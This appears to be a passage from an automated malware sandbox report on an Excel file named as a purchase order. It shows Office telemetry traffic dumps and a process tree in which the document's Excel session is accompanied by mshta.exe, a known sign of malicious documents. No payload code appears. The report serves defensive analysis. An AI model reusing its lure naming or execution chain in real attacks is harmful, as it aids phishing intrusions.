                                2025-03-26 18:48:44 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 37 38 31 76 31 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 37 38 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 67 6f 34 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 68 6c 76 79 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 49 33 32
                                Data Ascii: </C> <T> <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T="1" Id="bgo4t" /> <UTS T="2" Id="bhlvy" /> </S> <C T="I32
                                2025-03-26 18:48:44 UTC16384INData Raw: 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 30 30 30 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                Data Ascii: <L> <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R> </O> </L> <R> <O T="LE"> <
                                2025-03-26 18:48:44 UTC16384INData Raw: 20 49 3d 22 32 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 56 69 64 65 6f 43 61 6c 6c 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 36 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 33 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 53 61 53 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 34 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 4f 76 65 72 66 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54
                                Data Ascii: I="22" O="false" N="FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C> <C T="U32" I="24" O="false" N="FlyoutOverflow"> <C> <S T
                                2025-03-26 18:48:44 UTC16384INData Raw: 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 39 30 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 4e 44 42 2e 55 6e 6b 6e 6f 77 6e 2e 43 6f 72 72 75 70 74 69 6f 6e 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 53 3d 22 31 30 30 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 45 74 77 20 54 3d 22 31 22 20 45 3d 22 33 39 35 22 20 47 3d 22 7b 32 61 64 66 38 65 32 33 2d 30 61 66 39 2d
                                Data Ascii: coding="utf-8"?><R Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSU" xmlns=""> <S> <Etw T="1" E="395" G="{2adf8e23-0af9-
                                2025-03-26 18:48:44 UTC16384INData Raw: 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 33 22 20 49 64 3d 22 62 70 66 79 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 34 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 50 68 6f 74 6f 53 69 7a 65 49 6e 42 79 74 65 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 55 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55
                                Data Ascii: "TelemetryShutdown" /> <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V="0" T="U64" /> </R> </O> </F> </S> <C T="U
                                2025-03-26 18:48:44 UTC16384INData Raw: 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 65 76 65 6e 74 49 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 33 35 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 74 63 69 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20
                                Data Ascii: <L> <S T="4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L> <S T="5" F="tcid" /> </L> <R> <V
                                2025-03-26 18:48:44 UTC16384INData Raw: 0d 0a 20 20 20 20 3c 46 20 54 3d 22 31 30 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 46 69 6c 65 50 72 6f 74 65 63 74 69 6f 6e 53 74 61 74 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 35 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 4f 66 54 68 72 6f 77 6e 45 78 63 65 70 74 69 6f 6e 22 3e 0d
                                Data Ascii: <F T="10"> <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="CountOfThrownException">
                                2025-03-26 18:48:44 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 72 65 73 75 6c 74 73 5f 49 73 4e 75 6c 6c 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20
                                Data Ascii: <S T="5" F="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L> <R> <O T="EQ"> <L>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.74970113.107.246.414436896C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                TimestampBytes transferredDirectionData
                                2025-03-26 18:48:51 UTC214OUTGET /rules/rule120607v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                Host: otelrules.svc.static.microsoft
                                2025-03-26 18:48:51 UTC470INHTTP/1.1 200 OK
                                Date: Wed, 26 Mar 2025 18:48:51 GMT
                                Content-Type: text/xml
                                Content-Length: 204
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                ETag: "0x8DC582BB6C8527A"
                                x-ms-request-id: 7dec2a2a-f01e-0085-7e59-9e88ea000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20250326T184851Z-186b855ff67x7nlmhC1NYCzz4s0000000hf000000000292m
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2025-03-26 18:48:51 UTC204INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 37 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 45 52 3d 22 31 32 30 36 30 33 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 62 70 7a 73 22 20 41 3d 22 39 34 30 74 63 20 39 78 35 6a 73 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120607" V="1" DC="SM" T="Subrule" ER="120603" xmlns=""> <S> <UTS T="1" Id="bbpzs" A="940tc 9x5js" /> </S> <T> <S T="1" /> </T></R>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.74970213.107.246.414436896C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                TimestampBytes transferredDirectionData
                                2025-03-26 18:48:51 UTC214OUTGET /rules/rule120603v8s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                Host: otelrules.svc.static.microsoft
                                2025-03-26 18:48:51 UTC515INHTTP/1.1 200 OK
                                Date: Wed, 26 Mar 2025 18:48:51 GMT
                                Content-Type: text/xml
                                Content-Length: 2128
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                ETag: "0x8DC582BA41F3C62"
                                x-ms-request-id: 788ac460-101e-0028-1057-9e8f64000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20250326T184851Z-186b855ff67w57v5hC1NYC7m500000000hkg00000000022x
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                X-Cache-Info: L1_T2
                                Accept-Ranges: bytes
                                2025-03-26 18:48:51 UTC2128INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 33 22 20 56 3d 22 38 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 64 64 69 74 69 6f 6e 61 6c 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 45 3d 22 66 61 6c 73 65 22 20 44 4c 3d
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=


                                050100s020406080100

                                Click to jump to process

                                050100s0.0050100150MB

                                Click to jump to process

                                • File
                                • Registry

                                Click to dive into process behavior distribution

                                Target ID:0
                                Start time:14:47:33
                                Start date:26/03/2025
                                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                Imagebase:0x1d0000
                                File size:53'161'064 bytes
                                MD5 hash:4A871771235598812032C822E6F68F19
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                Target ID:11
                                Start time:14:48:29
                                Start date:26/03/2025
                                Path:C:\Windows\SysWOW64\mshta.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
                                Imagebase:0xdd0000
                                File size:13'312 bytes
                                MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                Target ID:13
                                Start time:14:48:38
                                Start date:26/03/2025
                                Path:C:\Windows\splwow64.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\splwow64.exe 12288
                                Imagebase:0x7ff611620000
                                File size:163'840 bytes
                                MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                Target ID:15
                                Start time:14:48:48
                                Start date:26/03/2025
                                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PURCHASE ORDER 517-2025.xla.xlsx"
                                Imagebase:0x1d0000
                                File size:53'161'064 bytes
                                MD5 hash:4A871771235598812032C822E6F68F19
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                No disassembly